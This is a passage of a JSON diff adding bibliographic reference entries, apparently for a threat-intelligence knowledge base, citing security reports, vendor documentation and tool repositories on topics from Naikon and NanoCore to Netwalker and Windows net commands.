"2023-09-07T00:00:00Z", + "date_published": "2023-09-07T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-250a" + ], + "source": "Tidal Cyber", + "title": "Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475" + }, + "related": [], + "uuid": "6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b", + "value": "U.S. CISA Zoho Exploits September 7 2023" + }, + { + "description": "CIS. (2017, May 15). Multiple Vulnerabilities in Microsoft Windows SMB Server Could Allow for Remote Code Execution. Retrieved April 3, 2018.", + "meta": { + "date_accessed": "2018-04-03T00:00:00Z", + "date_published": "2017-05-15T00:00:00Z", + "refs": [ + "https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/" + ], + "source": "MITRE", + "title": "Multiple Vulnerabilities in Microsoft Windows SMB Server Could Allow for Remote Code Execution" + }, + "related": [], + "uuid": "76d9da2c-1503-4105-b017-cb2b69298296", + "value": "CIS Multiple SMB Vulnerabilities" + }, + { + "description": "Orrù, M., Trotta, G.. (2019, September 11). Muraena. Retrieved October 14, 2019.", + "meta": { + "date_accessed": "2019-10-14T00:00:00Z", + "date_published": "2019-09-11T00:00:00Z", + "refs": [ + "https://github.com/muraenateam/muraena" + ], + "source": "MITRE", + "title": "Muraena" + }, + "related": [], + "uuid": "578ecf62-b546-4f52-9d50-92557edf2dd4", + "value": "GitHub Mauraena" + }, + { + "description": "Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018.", + "meta": { + "date_accessed": "2018-02-19T00:00:00Z", + "date_published": "2018-02-15T00:00:00Z", + "refs": [ + "https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/" + ], + "source": "MITRE", + "title": "Musical Chairs Playing Tetris" + }, + "related": [], + "uuid": "bddf44bb-7a0a-498b-9831-7b73cf9a582e", + "value": "Arbor Musical Chairs Feb 2018" + }, + { + "description": "Thomas, C. (n.d.). Mythc Documentation. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "refs": [ + "https://docs.mythic-c2.net/" + ], + "source": "MITRE", + "title": "Mythc Documentation" + }, + "related": [], + "uuid": "de3091b4-663e-4d9e-9dde-51250749863d", + "value": "Mythc Documentation" + }, + { + "description": "Thomas, C. (2018, July 4). Mythic. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "date_published": "2018-07-04T00:00:00Z", + "refs": [ + "https://github.com/its-a-feature/Mythic" + ], + "source": "MITRE", + "title": "Mythic" + }, + "related": [], + "uuid": "20d0adf0-b832-4b03-995e-dfb56474ddcc", + "value": "Mythic Github" + }, + { + "description": "Crowdstrike. (n.d.). Mythic Leopard. Retrieved October 6, 2021.", + "meta": { + "date_accessed": "2021-10-06T00:00:00Z", + "refs": [ + "https://adversary.crowdstrike.com/en-US/adversary/mythic-leopard/" + ], + "source": "MITRE", + "title": "Mythic Leopard" + }, + "related": [], + "uuid": "efa5dc67-3364-4049-bb13-8b9e1b55f172", + "value": "Crowdstrike Mythic Leopard Profile" + }, + { + "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020.", + "meta": { + "date_accessed": "2020-05-26T00:00:00Z", + "date_published": "2020-05-07T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/" + ], + "source": "MITRE", + "title": "Naikon APT: Cyber Espionage Reloaded" + }, + "related": [], + "uuid": "f080acab-a6a0-42e1-98ff-45e415393648", + "value": "CheckPoint Naikon May 2020" + }, + { + "description": "Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.", + "meta": { + "date_accessed": "2021-06-29T00:00:00Z", + "date_published": "2021-04-23T00:00:00Z", + "refs": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf" + ], + "source": "MITRE", + "title": "NAIKON – Traces from a Military Cyber-Espionage Operation" + }, + "related": [], + "uuid": "55660913-4c03-4360-bb8b-1cad94bd8d0e", + "value": "Bitdefender Naikon April 2021" + }, + { + "description": "Microsoft. (2018, May 31). Named Pipes. Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes" + ], + "source": "MITRE", + "title": "Named Pipes" + }, + "related": [], + "uuid": "09a3f7dd-5597-4a55-8408-a2f09f4efcd4", + "value": "Microsoft Named Pipes" + }, + { + "description": "F-Secure Labs. (2016, July). NANHAISHU RATing the South China Sea. Retrieved July 6, 2018.", + "meta": { + "date_accessed": "2018-07-06T00:00:00Z", + "date_published": "2016-07-01T00:00:00Z", + "refs": [ + "https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf" + ], + "source": "MITRE", + "title": "NANHAISHU RATing the South China Sea" + }, + "related": [], + "uuid": "41984650-a0ac-4445-80b6-7ceaf93bd135", + "value": "fsecure NanHaiShu July 2016" + }, + { + "description": "The DigiTrust Group. (2017, January 01). NanoCore Is Not Your Average RAT. Retrieved November 9, 2018.", + "meta": { + "date_accessed": "2018-11-09T00:00:00Z", + "date_published": "2017-01-01T00:00:00Z", + "refs": [ + "https://www.digitrustgroup.com/nanocore-not-your-average-rat/" + ], + "source": "MITRE", + "title": "NanoCore Is Not Your Average RAT" + }, + "related": [], + "uuid": "6abac972-bbd0-4cd2-b3a7-25e7825ac134", + "value": "DigiTrust NanoCore Jan 2017" + }, + { + "description": "Kasza, A., Halfpop, T. (2016, February 09). NanoCoreRAT Behind an Increase in Tax-Themed Phishing E-mails. Retrieved November 9, 2018.", + "meta": { + "date_accessed": "2018-11-09T00:00:00Z", + "date_published": "2016-02-09T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2016/02/nanocorerat-behind-an-increase-in-tax-themed-phishing-e-mails/" + ], + "source": "MITRE", + "title": "NanoCoreRAT Behind an Increase in Tax-Themed Phishing E-mails" + }, + "related": [], + "uuid": "caa0a421-04b0-4ebc-b365-97082d69d33d", + "value": "PaloAlto NanoCore Feb 2016" + }, + { + "description": "Unit 42. (2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019.", + "meta": { + "date_accessed": "2019-10-07T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/" + ], + "source": "MITRE", + "title": "National Security Think Tanks" + }, + "related": [], + "uuid": "634404e3-e2c9-4872-a280-12d2be168cba", + "value": "Unit42 BabyShark Feb 2019" + }, + { + "description": "National Vulnerability Database. (n.d.). National Vulnerability Database. Retrieved October 15, 2020.", + "meta": { + "date_accessed": "2020-10-15T00:00:00Z", + "refs": [ + "https://nvd.nist.gov/" + ], + "source": "MITRE", + "title": "National Vulnerability Database" + }, + "related": [], + "uuid": "9b42dcc6-a39c-4d74-adc3-135f9ceac5ba", + "value": "National Vulnerability Database" + }, + { + "description": "Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.", + "meta": { + "date_accessed": "2017-03-09T00:00:00Z", + "date_published": "2013-07-12T00:00:00Z", + "refs": [ + "https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html" + ], + "source": "MITRE", + "title": "Nations Buying as Hackers Sell Flaws in Computer Code" + }, + "related": [], + "uuid": "a3e224e7-fe22-48d6-9ff5-35900f06c060", + "value": "NationsBuying" + }, + { + "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.", + "meta": { + "date_accessed": "2020-05-18T00:00:00Z", + "date_published": "2020-05-07T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html" + ], + "source": "MITRE", + "title": "Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents" + }, + "related": [], + "uuid": "02338a66-6820-4505-8239-a1f1fcc60d32", + "value": "FireEye Maze May 2020" + }, + { + "description": "Mercer, W., Rascagneres, P. (2018, May 31). NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea. Retrieved June 11, 2018.", + "meta": { + "date_accessed": "2018-06-11T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2018/05/navrat.html" + ], + "source": "MITRE", + "title": "NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea" + }, + "related": [], + "uuid": "f644ac27-a923-489b-944e-1ba89c609307", + "value": "Talos NavRAT May 2018" + }, + { + "description": "Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017.", + "meta": { + "date_accessed": "2017-11-17T00:00:00Z", + "date_published": "2014-02-07T00:00:00Z", + "refs": [ + "https://github.com/nomex/nbnspoof" + ], + "source": "MITRE", + "title": "NBNSpoof" + }, + "related": [], + "uuid": "4119091a-96f8-441c-b66f-ee0d9013d7ca", + "value": "GitHub NBNSpoof" + }, + { + "description": "SecTools. (2003, June 11). NBTscan. Retrieved March 17, 2021.", + "meta": { + "date_accessed": "2021-03-17T00:00:00Z", + "date_published": "2003-06-11T00:00:00Z", + "refs": [ + "https://sectools.org/tool/nbtscan/" + ], + "source": "MITRE", + "title": "NBTscan" + }, + "related": [], + "uuid": "505c9e8b-66e0-435c-835f-b4405ba91966", + "value": "SecTools nbtscan June 2003" + }, + { + "description": "Bezroutchko, A. (2019, November 19). NBTscan man page. Retrieved March 17, 2021.", + "meta": { + "date_accessed": "2021-03-17T00:00:00Z", + "date_published": "2019-11-19T00:00:00Z", + "refs": [ + "https://manpages.debian.org/testing/nbtscan/nbtscan.1.en.html" + ], + "source": "MITRE", + "title": "NBTscan man page" + }, + "related": [], + "uuid": "8d718be1-9695-4e61-a922-5162d88477c0", + "value": "Debian nbtscan Nov 2019" + }, + { + "description": "Microsoft. (n.d.). Nbtstat. Retrieved April 17, 2016.", + "meta": { + "date_accessed": "2016-04-17T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc940106.aspx" + ], + "source": "MITRE", + "title": "Nbtstat" + }, + "related": [], + "uuid": "1b1e6b08-fc2a-48f7-82bd-e3c1a7a0d97e", + "value": "TechNet Nbtstat" + }, + { + "description": "NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.", + "meta": { + "date_accessed": "2020-06-10T00:00:00Z", + "date_published": "2020-02-20T00:00:00Z", + "refs": [ + "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory" + ], + "source": "MITRE", + "title": "NCSC supports US advisory regarding GRU intrusion set Sandworm" + }, + "related": [], + "uuid": "d876d037-9d24-44af-b8f0-5c1555632b91", + "value": "NCSC Sandworm Feb 2020" + }, + { + "description": "Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017.", + "meta": { + "date_accessed": "2017-11-17T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/cc958811.aspx" + ], + "source": "MITRE", + "title": "NetBIOS Name Resolution" + }, + "related": [], + "uuid": "f756ee2e-2e79-41df-bf9f-6492a9708663", + "value": "TechNet NetBIOS" + }, + { + "description": "Microsoft. (2017, February 14). Net Commands On Windows Operating Systems. Retrieved March 19, 2020.", + "meta": { + "date_accessed": "2020-03-19T00:00:00Z", + "date_published": "2017-02-14T00:00:00Z", + "refs": [ + "https://support.microsoft.com/en-us/help/556003" + ], + "source": "MITRE", + "title": "Net Commands On Windows Operating Systems" + }, + "related": [], + "uuid": "a04320b9-0c6a-49f9-8b84-50587278cdfb", + "value": "Microsoft Net" + }, + { + "description": "Savill, J. (1999, March 4). Net.exe reference. Retrieved September 22, 2015.", + "meta": { + "date_accessed": "2015-09-22T00:00:00Z", + "date_published": "1999-03-04T00:00:00Z", + "refs": [ + "http://windowsitpro.com/windows/netexe-reference" + ], + "source": "MITRE", + "title": "Net.exe reference" + }, + "related": [], + "uuid": "e814d4a5-b846-4d68-ac00-7021238d287a", + "value": "Savill 1999" + }, + { + "description": "Microsoft. (2006, October 18). Net.exe Utility. Retrieved September 22, 2015.", + "meta": { + "date_accessed": "2015-09-22T00:00:00Z", + "date_published": "2006-10-18T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/aa939914" + ], + "source": "MITRE", + "title": "Net.exe Utility" + }, + "related": [], + "uuid": "75998d1c-69c0-40d2-a64b-43ad8efa05da", + "value": "Microsoft Net Utility" + }, + { + "description": "Microsoft. (2009, June 3). Netsh Commands for Windows Firewall. Retrieved April 20, 2016.", + "meta": { + "date_accessed": "2016-04-20T00:00:00Z", + "date_published": "2009-06-03T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc771046(v=ws.10).aspx" + ], + "source": "MITRE", + "title": "Netsh Commands for Windows Firewall" + }, + "related": [], + "uuid": "00fb3fa3-6f72-47ad-a950-f258a70485f2", + "value": "TechNet Netsh Firewall" + }, + { + "description": "LOLBAS. (2019, December 24). Netsh.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-12-24T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Netsh/" + ], + "source": "Tidal Cyber", + "title": "Netsh.exe" + }, + "related": [], + "uuid": "6d76b28f-ab57-46bd-871d-1488212d3a8f", + "value": "Netsh.exe - LOLBAS Project" + }, + { + "description": "Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved February 13, 2017.", + "meta": { + "date_accessed": "2017-02-13T00:00:00Z", + "date_published": "2016-09-26T00:00:00Z", + "refs": [ + "https://github.com/outflankbv/NetshHelperBeacon" + ], + "source": "MITRE", + "title": "NetshHelperBeacon" + }, + "related": [], + "uuid": "c3169722-9c32-4a38-a7fe-8d4b6e51ca36", + "value": "Github Netsh Helper CS Beacon" + }, + { + "description": "Microsoft. (n.d.). Netstat. Retrieved April 17, 2016.", + "meta": { + "date_accessed": "2016-04-17T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/bb490947.aspx" + ], + "source": "MITRE", + "title": "Netstat" + }, + "related": [], + "uuid": "84ac26d8-9c7c-4c8c-bf64-a9fb4578388c", + "value": "TechNet Netstat" + }, + { + "description": "Microsoft. (n.d.). Net time. Retrieved November 25, 2016.", + "meta": { + "date_accessed": "2016-11-25T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/bb490716.aspx" + ], + "source": "MITRE", + "title": "Net time" + }, + "related": [], + "uuid": "83094489-791f-4925-879f-e79f67e4bf1f", + "value": "TechNet Net Time" + }, + { + "description": "Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.", + "meta": { + "date_accessed": "2016-11-25T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/bb490717.aspx" + ], + "source": "MITRE", + "title": "Net Use" + }, + "related": [], + "uuid": "f761d4b6-8fc5-4037-aa34-7982c17f8bed", + "value": "Technet Net Use" + }, + { + "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020.", + "meta": { + "date_accessed": "2020-05-26T00:00:00Z", + "date_published": "2020-05-18T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/" + ], + "source": "MITRE", + "title": "Netwalker Fileless Ransomware Injected via Reflective Loading" + }, + "related": [], + "uuid": "ceda9ef6-e609-4a34-9db1-d2a3ebffb679", + "value": "TrendMicro Netwalker May 2020" + }, + { + "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020.", + "meta": { + "date_accessed": "2020-05-27T00:00:00Z", + "date_published": "2020-05-27T00:00:00Z", + "refs": [ + "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/" + ], + "source": "MITRE", + "title": "Netwalker ransomware tools give insight into threat actor" + }, + "related": [], + "uuid": "721db562-6046-4f47-95a1-36a16f26f3d1", + "value": "Sophos Netwalker May 2020" + }, + { + "description": "McAfee. (2015, March 2). Netwire RAT Behind Recent Targeted Attacks. Retrieved February 15, 2018.", + "meta": { + "date_accessed": "2018-02-15T00:00:00Z", + "date_published": "2015-03-02T00:00:00Z", + "refs": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/netwire-rat-behind-recent-targeted-attacks/" + ], + "source": "MITRE", + "title": "Netwire RAT Behind Recent Targeted Attacks" + }, + "related": [], + "uuid": "b02fbf00-f571-4507-941d-ac1d4a8310b0", + "value": "McAfee Netwire Mar 2015" + }, + { + "description": "Microsoft. (2017, April 19). Network access: Do not allow anonymous enumeration of SAM accounts and shares. Retrieved May 20, 2020.", + "meta": { + "date_accessed": "2020-05-20T00:00:00Z", + "date_published": "2017-04-19T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-do-not-allow-anonymous-enumeration-of-sam-accounts-and-shares" + ], + "source": "MITRE", + "title": "Network access: Do not allow anonymous enumeration of SAM accounts and shares" + }, + "related": [], + "uuid": "25e0244a-b829-4df9-a435-b6f9f1a2f0bc", + "value": "Windows Anonymous Enumeration of SAM Accounts" + }, + { + "description": "Microsoft. (2016, August 31). Network access: Do not allow storage of passwords and credentials for network authentication. Retrieved November 23, 2020.", + "meta": { + "date_accessed": "2020-11-23T00:00:00Z", + "date_published": "2016-08-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/jj852185(v=ws.11)?redirectedfrom=MSDN" + ], + "source": "MITRE", + "title": "Network access: Do not allow storage of passwords and credentials for network authentication" + }, + "related": [], + "uuid": "e0d8c585-e898-43ba-8d46-201dbe52db56", + "value": "Microsoft Network access Credential Manager" + }, + { + "description": "Microsoft. (2018, July 9). Network File System overview. Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2018-07-09T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview" + ], + "source": "MITRE", + "title": "Network File System overview" + }, + "related": [], + "uuid": "1e49b346-d822-4f82-92db-2989313d07e9", + "value": "Microsoft NFS Overview" + }, + { + "description": "Microsoft. (2021, January 7). Network Provider API. Retrieved March 30, 2023.", + "meta": { + "date_accessed": "2023-03-30T00:00:00Z", + "date_published": "2021-01-07T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/secauthn/network-provider-api" + ], + "source": "MITRE", + "title": "Network Provider API" + }, + "related": [], + "uuid": "b218434e-4233-5963-824e-50ee32d468ed", + "value": "Network Provider API" + }, + { + "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020.", + "meta": { + "date_accessed": "2020-05-19T00:00:00Z", + "date_published": "2020-04-16T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/" + ], + "source": "MITRE", + "title": "New AgentTesla variant steals WiFi credentials" + }, + "related": [], + "uuid": "87f4fe4c-54cd-40a7-938b-6e6f6d2efbea", + "value": "Malwarebytes Agent Tesla April 2020" + }, + { + "description": "Hossein Jazi. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved September 8, 2023.", + "meta": { + "date_accessed": "2023-09-08T00:00:00Z", + "date_published": "2020-04-16T00:00:00Z", + "refs": [ + "https://www.malwarebytes.com/blog/news/2020/04/new-agenttesla-variant-steals-wifi-credentials" + ], + "source": "MITRE", + "title": "New AgentTesla variant steals WiFi credentials" + }, + "related": [], + "uuid": "b61b7db6-ed0d-546d-b1e0-c2630530975b", + "value": "Malware Bytes New AgentTesla variant steals WiFi credentials" + }, + { + "description": "Chen, Joseph. (2018, July 16). New Andariel Reconnaissance Tactics Uncovered. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2018-07-16T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html" + ], + "source": "MITRE", + "title": "New Andariel Reconnaissance Tactics Uncovered" + }, + "related": [], + "uuid": "b667eb44-8c2f-4319-bc93-f03610214b8b", + "value": "TrendMicro New Andariel Tactics July 2018" + }, + { + "description": "Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018.", + "meta": { + "date_accessed": "2018-08-02T00:00:00Z", + "date_published": "2016-01-22T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/" + ], + "source": "MITRE", + "title": "New Attacks Linked to C0d0so0 Group" + }, + "related": [], + "uuid": "c740fc1c-093e-4389-890e-1fd88a824df4", + "value": "Unit 42 C0d0so0 Jan 2016" + }, + { + "description": "Salvio, J.. (2014, June 27). New Banking Malware Uses Network Sniffing for Data Theft. Retrieved March 25, 2019.", + "meta": { + "date_accessed": "2019-03-25T00:00:00Z", + "date_published": "2014-06-27T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/" + ], + "source": "MITRE", + "title": "New Banking Malware Uses Network Sniffing for Data Theft" + }, + "related": [], + "uuid": "4fee21e3-1b8f-4e10-b077-b59e2df94633", + "value": "Trend Micro Banking Malware Jan 2019" + }, + { + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020.", + "meta": { + "date_accessed": "2020-07-14T00:00:00Z", + "date_published": "2017-11-13T00:00:00Z", + "refs": [ + "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/" + ], + "source": "MITRE", + "title": "New Banking Trojan IcedID Discovered by IBM X-Force Research" + }, + "related": [], + "uuid": "fdc56361-24f4-4fa5-949e-02e61c4d3be8", + "value": "IBM IcedID November 2017" + }, + { + "description": "Zargarov, N. (2022, May 2). New Black Basta Ransomware Hijacks Windows Fax Service. Retrieved March 7, 2023.", + "meta": { + "date_accessed": "2023-03-07T00:00:00Z", + "date_published": "2022-05-02T00:00:00Z", + "refs": [ + "https://minerva-labs.com/blog/new-black-basta-ransomware-hijacks-windows-fax-service/" + ], + "source": "MITRE", + "title": "New Black Basta Ransomware Hijacks Windows Fax Service" + }, + "related": [], + "uuid": "6358f7ed-41d6-56be-83bb-179e0a8b7873", + "value": "Minerva Labs Black Basta May 2022" + }, + { + "description": "Weidemann, A. (2021, January 25). New campaign targeting security researchers. Retrieved December 20, 2021.", + "meta": { + "date_accessed": "2021-12-20T00:00:00Z", + "date_published": "2021-01-25T00:00:00Z", + "refs": [ + "https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/" + ], + "source": "MITRE", + "title": "New campaign targeting security researchers" + }, + "related": [], + "uuid": "fb4b3427-353d-44c7-8dcd-d257324a83b2", + "value": "Google TAG Lazarus Jan 2021" + }, + { + "description": "Perigaud, F. (2015, December 15). Newcomers in the Derusbi family. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2015-12-15T00:00:00Z", + "refs": [ + "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family" + ], + "source": "MITRE", + "title": "Newcomers in the Derusbi family" + }, + "related": [], + "uuid": "9b419a40-c20b-40dd-8627-9c1c786bf165", + "value": "Airbus Derusbi 2015" + }, + { + "description": "Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019.", + "meta": { + "date_accessed": "2019-09-06T00:00:00Z", + "date_published": "2018-04-24T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/" + ], + "source": "MITRE", + "title": "New Crossrider variant installs configuration profiles on Macs" + }, + "related": [], + "uuid": "80530288-26a3-4c3e-ace1-47510df10fbd", + "value": "Malwarebytes Crossrider Apr 2018" + }, + { + "description": "Gavriel, H. & Erbesfeld, B. (2018, April 11). New ‘Early Bird’ Code Injection Technique Discovered. Retrieved May 24, 2018.", + "meta": { + "date_accessed": "2018-05-24T00:00:00Z", + "date_published": "2018-04-11T00:00:00Z", + "refs": [ + "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/" + ], + "source": "MITRE", + "title": "New ‘Early Bird’ Code Injection Technique Discovered" + }, + "related": [], + "uuid": "8ae4ec67-518e-46dd-872c-7e2a9ca4ef13", + "value": "CyberBit Early Bird Apr 2018" + }, + { + "description": "Sahil Antil, Sudeep Singh. (2022, January 20). New espionage attack by Molerats APT targeting users in the Middle East. Retrieved October 10, 2023.", + "meta": { + "date_accessed": "2023-10-10T00:00:00Z", + "date_published": "2022-01-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east" + ], + "source": "Tidal Cyber", + "title": "New espionage attack by Molerats APT targeting users in the Middle East" + }, + "related": [], + "uuid": "3b39e73e-229f-4ff4-bec3-d83e6364a66e", + "value": "Zscaler Molerats Campaign" + }, + { + "description": "Feeley, B. and Stone-Gross, B. (2019, March 20). New Evidence Proves Ongoing WIZARD SPIDER / LUNAR SPIDER Collaboration. Retrieved June 15, 2020.", + "meta": { + "date_accessed": "2020-06-15T00:00:00Z", + "date_published": "2019-03-20T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/" + ], + "source": "MITRE", + "title": "New Evidence Proves Ongoing WIZARD SPIDER / LUNAR SPIDER Collaboration" + }, + "related": [], + "uuid": "d7001d6f-97a1-4155-8f74-3d878d4cbb27", + "value": "CrowdStrike Wizard Spider March 2019" + }, + { + "description": "Abrams, L. (2021, June 6). New Evil Corp ransomware mimics PayloadBin gang to evade US sanctions. Retrieved July 19, 2022.", + "meta": { + "date_accessed": "2022-07-19T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/" + ], + "source": "Tidal Cyber", + "title": "New Evil Corp ransomware mimics PayloadBin gang to evade US sanctions" + }, + "related": [], + "uuid": "5695d3a2-6b6c-433a-9254-d4a2e001a8be", + "value": "Bleeping Computer Evil Corp mimics PayloadBin gang 2022" + }, + { + "description": "Windows Defender Research. (2016, March 22). New feature in Office 2016 can block macros and help prevent infection. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "date_published": "2016-03-22T00:00:00Z", + "refs": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/" + ], + "source": "MITRE", + "title": "New feature in Office 2016 can block macros and help prevent infection" + }, + "related": [], + "uuid": "4d0f4d0a-b812-42f8-a52c-a1f5c69e6337", + "value": "Microsoft Block Office Macros" + }, + { + "description": "Microsoft Malware Protection Center. (2016, March 22). New feature in Office 2016 can block macros and help prevent infection. Retrieved July 3, 2017.", + "meta": { + "date_accessed": "2017-07-03T00:00:00Z", + "date_published": "2016-03-22T00:00:00Z", + "refs": [ + "https://blogs.technet.microsoft.com/mmpc/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/" + ], + "source": "MITRE", + "title": "New feature in Office 2016 can block macros and help prevent infection" + }, + "related": [], + "uuid": "f14f08c5-de51-4827-ba3a-f0598dfbe505", + "value": "TechNet Office Macro Security" + }, + { + "description": "Sudhakar Ramakrishna . (2021, January 11). New Findings From Our Investigation of SUNBURST. Retrieved January 13, 2021.", + "meta": { + "date_accessed": "2021-01-13T00:00:00Z", + "date_published": "2021-01-11T00:00:00Z", + "refs": [ + "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/" + ], + "source": "MITRE", + "title": "New Findings From Our Investigation of SUNBURST" + }, + "related": [], + "uuid": "1be1b6e0-1b42-4d07-856b-b6321c17bb88", + "value": "SolarWinds Sunburst Sunspot Update January 2021" + }, + { + "description": "Gatlan, S. (2019, July 3). New Godlua Malware Evades Traffic Monitoring via DNS over HTTPS. Retrieved March 15, 2020.", + "meta": { + "date_accessed": "2020-03-15T00:00:00Z", + "date_published": "2019-07-03T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/new-godlua-malware-evades-traffic-monitoring-via-dns-over-https/" + ], + "source": "MITRE", + "title": "New Godlua Malware Evades Traffic Monitoring via DNS over HTTPS" + }, + "related": [], + "uuid": "fd862d10-79bc-489d-a552-118014d01648", + "value": "BleepingComp Godlua JUL19" + }, + { + "description": "Subramanian, K. (2020, August 18). New HTML Smuggling Attack Alert: Duri. Retrieved May 20, 2021.", + "meta": { + "date_accessed": "2021-05-20T00:00:00Z", + "date_published": "2020-08-18T00:00:00Z", + "refs": [ + "https://www.menlosecurity.com/blog/new-attack-alert-duri" + ], + "source": "MITRE", + "title": "New HTML Smuggling Attack Alert: Duri" + }, + "related": [], + "uuid": "a9fc3502-66c2-4504-9886-458f8a803b5d", + "value": "HTML Smuggling Menlo Security 2020" + }, + { + "description": "Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.", + "meta": { + 